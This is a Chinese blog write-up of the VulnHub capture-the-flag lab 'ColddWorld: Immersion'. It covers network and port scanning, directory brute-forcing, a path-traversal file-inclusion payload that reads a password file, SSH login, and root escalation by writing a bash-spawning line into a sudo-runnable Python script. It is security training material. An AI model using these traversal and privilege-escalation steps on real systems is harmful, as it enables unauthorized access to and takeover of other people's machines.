COLDDWORLD: IMMERSION

已于 2024-03-05 23:39:11 修改
阅读量978 收藏 20
点赞数 33
分类专栏: 靶机 文章标签: linux web安全 网络安全 安全
于 2024-03-03 14:26:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81315376/article/details/136412291
版权

目录

靶机下载地址:ColddWorld: Immersion ~ VulnHub

目标:取得两个flag

 一、信息收集

1. 确认靶机IP

2. 端口扫描

3. 使用浏览器访问80端口网页

   3.1 查看源码

4. 使用gobuster爆破目录

5. 访问login界面

   5.1 弱密码尝试 查看网页回显信息

6. 查看登陆界面源码

二、渗透过程

1. 获取密码

  1.1文件包含漏洞利用

  1.2 base64解码

2. ssh远程连接

3. 取得两个flag

   3.1 获得第一个flag

3.2 提权

3.3 获得第二个flag

 

靶机下载地址:ColddWorld: Immersion ~ VulnHub

 

目标:取得两个flag

 

 一、信息收集

1. 确认靶机IP

┌──(kali💋kali)-[~]
└─$ sudo arp-scan -I eth0 10.9.23.0/24             #(指定网卡扫描)

b4bf9b7924dc4406a5bda609837f392a.png

2. 端口扫描

使用nmap进行全端口扫描

┌──(kali💋kali)-[~]
└─$ sudo nmap -A -p- 10.9.23.231

 

# -A 全面扫描,获取更多的信息
# -p- 全端口扫描,扫描主机上0-65535个端口

c0f17325b2604171aaa84fcf61d298ac.png

开放端口信息
PORTSTATESERVICEVERSION
80openhttpApache httpd 2.4.18 ((Ubuntu))
3042opensshOpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)

3. 使用浏览器访问80端口网页

3654e9716b5c4d3080f08c017cb1001d.png

   3.1 查看源码

     源码无可用信息

28a18a2d6b1147888d1b36f8da892ae2.png

4. 使用gobuster爆破目录

┌──(kali💋kali)-[~]
└─$ gobuster dir -u http://10.9.23.231 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,txt,html,js,zip

 

# dir 目录爆破模式

# -u 指定目标URL

# -w 指定目录字典

# -x 指定扫描的文件后缀

3eb2730716a840a0a2e63519083898e7.png

5. 访问login界面

ad4e447d81714ed2b8e84e6b169712c7.png

   5.1 弱密码尝试 查看网页回显信息

     第一次尝试

b909f9d14b7d4aeebb5d3e0242383296.png

     第二次尝试......

6e3c768450c6439ea2dd08a2f243c357.png

   经过几次尝试,发现不管我们怎么登陆网页都会重定向到空白页

6. 查看登陆界面源码

f3bc82d0fe404743b56fa0f4b4bd2547.png

在源码界面我发现了两个用户名carls,c0ldd,以及c0ldd留下的一条消息:密码留在了/var下的名为carls.txt的文件中

并且通过提示account.php界面存在文件包含漏洞,并且使用get传参,我们可以直接通过URL去访问carls.txt文件

二、渗透过程

1. 获取密码

  1.1文件包含漏洞利用

   获取carls用户密码

http://10.9.23.231/login/account.php?page=../../../../var/carls.txt

33a3e550671441b68f7b36f9709bd5c6.png

成功获得密码:Y2FybG9z

  1.2 base64解码

密码为base64编码,利用burp suite Decoder模块进行解码:carlos

bcb429afd60041abb92a143c5067f58e.png

2. ssh远程连接

┌──(kali💋kali)-[~]
└─$ ssh carls@10.9.23.231 -p 3042

 

# 密码:carlos

# -p 指定端口连接

9dc11793b48c4b2e9bf0ec326c489cca.png

3. 取得两个flag

执行sudo -l

可以看到我们可以作为carls用户直接执行c0ldd用户的/bin/bash命令

b71aa57b313b46d6a6ea7ea21fabd2c8.png

执行/bin/bash

d175c9b2c8a5493e8b3f1af378b821b1.png

   3.1 获得第一个flag

1e09a930664a415dbad136286a97cbce.png

再次执行sudo -l

我们可以以root身份执行DoNotRun.py文件

9b81bce22e264aa8b287758bccf9631c.png

使用vim编辑器将

import os

os.system("/bin/bash")       写入到py文件中   wq!保存

c7d6737cd609424dbe4bc584cfac6617.png

1e2b6b8702c243ed8c5de4793a37875c.png

3.2 提权

执行DoNotRun.py

sudo -u root /usr/bin/python3 /home/c0ldd/DoNotRun.py

提权成功!

41fc892501ff487d8d71b2fcaf1f0dc3.png

3.3 获得第二个flag

echo 'RmVsaWNpZGFkZXMgY3JhY2s=' | base64 -d

222d540e84cc45c9a12641210428c680.png

 

 

开心修勾
关注
  • 33
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
alurakut:React Immersion 第三版
07-24
React Immersion 第三版 在推动的 Immersão React 第三版期间开发的项目。 屏幕 技术 安装 yarn install # ou npm install 运行项目 yarn dev # ou npm run dev
flaquiz:在Immersion React v2 Alura中创建的关于Flamengo 2019的测验
05-24
带有样式组件的示例应用 此示例介绍了如何使用与样式不同的样式解决方案,还支持通用样式。 这意味着我们可以为HTML中的第一个渲染提供所需的样式,然后将其余样式加载到客户端中。 在这种情况下,我们使用 。 为此,我们扩展了<Document>并将服务器端渲染的样式注入到<head> ,并且还添加了babel-plugin-styled-components (服务器端渲染所需)。 另外,我们使用NextJS自定义组件为样式组件设置了全局。 自己部署 使用部署示例: 如何使用 使用或执行以引导示例: npx create-next-app --example with-styled-components with-styled-components-app # or yarn create next-app --example with-styled-components with-s
tem-cafe:Immersion Alura React-具有样式化组件的Next.js期间创建的测验项目
05-24
TEMCAFÉ? -测验 此示例介绍了如何使用与样式不同的样式解决方案,还支持通用样式。 这意味着我们可以为HTML中的第一个渲染提供所需的样式,然后将其余样式加载到客户端中。 在这种情况下,我们使用 。 为此,我们扩展了<Document>并将服务器端渲染的样式注入到<head> ,并且还添加了babel-plugin-styled-components (服务器端渲染所需)。 另外,我们使用NextJS自定义组件为样式组件设置了全局。 自己部署 使用部署示例: 如何使用 使用或执行以引导示例: npx create-next-app --example with-styled-components with-styled-components-app # or yarn create next-app --example with-styled-components with-
pcf-immersion-workspace:云铸造
06-02
= pcf 沉浸式工作区
ReactJS-Immersion:深入研究ReactJS
02-12
ReactJS-沉浸式 深入研究ReactJS
Vulnhub: ColddWorld: Immersion靶机
qq_43884092的博客
08-07 141
文件包含carls.txt得到账号密码,sudo提权
邮件数据挖掘分析工具Immersion
07-12 332
网站是: https://immersion.media.mit.edu/ 登录Login securely via Gmail后, 输入你的用户名和密码,之后单击你的头像就可以进入图形界面. 目前之支持Gmail. 你也可以单击具体的某个人,就可以显示出这个人的一个信息。
vulnhub靶机Immersion_Machine
m0_73248913的博客
01-24 393
vulnhub靶机
vuln靶场--Immersion_Machine
bobo_milk的博客
05-10 411
Immersion_Machine
quiz-valorant:Alura Immersion,Next.js,样式化组件和React
05-24
阿罗拉勇敢测验 该项目是在沉浸式Alura-React和NextJs期间开发的 关于 选择的主题是有关Riot Games游戏的,目的是为了学习,在那里玩家将测试自己对Valorant的了解,并回答10个问题。 在每个结果的末尾,将显示谁在各自的等级中得分最高,Firebase用于保存结果。 而且,还可以通过与API集成的Node.js访问其他Quize。 描述 沉浸式编程的目的是在与Reac.Js一起使用的Next.js框架上开发知识,以开发SSR,SSE应用程序,并优化界面以获得更好的用户体验。 项目中使用的技术 节点 React堆 火力基地 框架运动 Java脚本 在沉浸中看到了什么 钩子概念 组件生命周期 样式化的组件概念 关于道具的概念 预渲染和服务器端渲染概念 部署和构建概念 在Vercel部署 UseEffets(),useState(),useRoute()概念最常用的H
Immersion:Immersion Mod 的仓库
06-20
浸没 Minecraft 1.7.10 沉浸式模组的存储库。 如果您需要开发版本,请将 build.gradle 中的版本标记为 1.7.10-DEVELOPMENT 版本控制由以下系统提供: Release.Beta.Alpha.Bugfix 因此版本 0.1.8.2 是 Relase 0(预...
aluraquiz:React Immersion v2之后创建的问题
05-09
带有样式组件的示例应用 此示例介绍了如何使用与样式不同的样式解决方案,还支持通用样式。... 在这种情况下,我们使用 。 为此,我们扩展了并将服务器端渲染的样式注入到<head> ,并且还添加了babel-plugin-...
显微镜浸油 Immersion Oils
最新发布
Neobioscience的博客
05-11 786
几十年来,Cargille一直在显微镜浸油的开发和标准化方面处于领先地位,Cargille浸油无色、无味、无毒,达到甚至超过 ISO 8036-1标准,Cargille也参与了浸油ISO规范的制订。HF型的荧光比LDF型略强,但不含卤素。显微镜浸油主要用于浸泡显微镜物镜,其配方要求具有良好的光学效应,在使用过程中浸油构成了显微镜光学系统的一部分,在采用高倍物镜观察玻片标本时,能获得最佳的光学效果,以保证成像质量。Type 300的设计和生产满足该类设备的严格要求,包括专门的粘度和对一致性的严格控制。
51 talk immersion notes
相信并热爱着
08-06 1181
Accepting A Suggestion 1. That sounds great. I'll take it. 2. good idea 3. it will save you some time 4. That sounds like a really good idea.  5. I think it makes sense. Ask for pref
MIT CMS.300 Session 8 – IMMERSION 沉浸/沉浸感
Kovotsuki的博客
02-11 2368
前言: 人脑是会自己骗自己的,抓住游戏的本质特征,就能很简单的让玩家沉浸在虚拟世界中。 Session8–IMMERSION沉浸/沉浸感 Readings Murray,'Immersion' Csikszentmihalyi,Flow Concepts/Keywords ·immersion沉浸 ·transitionalobjects过渡对象 (第四面墙 ·luminalspace ·avatar化身角色 ...
联想扩展Immersion触觉反馈技术的应用
weixin_34307464的博客
07-04 138
中国上海,2017年 3月15日:领先的触觉反馈技术开发商和授权商Immersion 公司(纳斯达克股票交易代码:IMMR)今日宣布,联想集团(Lenovo PC HK Ltd)在全新YOGA A12 二合一平板电脑中应用了Immersion触觉反馈技术。有了触觉反馈技术的应用,消费者现在可以在联想业界领先的无键键盘上感受到高端的交互输入体验。 作为一款...
ThoughtWorks Immersion小计
huangbowen521的专栏
01-19 1716
2012年12月18日,第11期TWI在中国西安举行了。这次参加培训的角色有admin,有hr,有Ux,当然更多的是QA和Dev,估计是最齐全的一届。 虽然TWI已经过去好几天了,但是我还在回味那培训中的一幕幕。 关于这几天的经历,我可以用几个关键字来形容。 吃: 虽然我们来到西安是学习滴,但是也不能委屈了自己的胃。刚到西安就先吃了羊肉泡馍,外加一个肉夹馍才感觉有些饱。第一天中午办公室定的
客户的产品文档如下:The finish is Immersion gold with IPC Class 2 standard. The product number is HS45897-1, with a finished thickness of 1.6cm and a copper thickness of 1OZ. The finished product is 18cm long and 30cm wide.请提取:产品编号,成品厚度,成品铜厚,产品长,产品宽、表面类型、IPC标准(格式:IPC-? class),客户代码这些数据,单位和数分开,没有提取到的参数用Null填入,数据翻译成中文。请讲OZ单位换算成微米。json形式中文输出。
03-26
"表面类型": "Immersion gold", "IPC标准": "IPC-Class 2", "客户代码": null } 注:OZ是“盎司”的单位,而在电路板生产中,OZ一般指的是铜箔厚度,1OZ指的是铜箔厚度为35um左右,实际上是1oz=28.35g,与重量...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值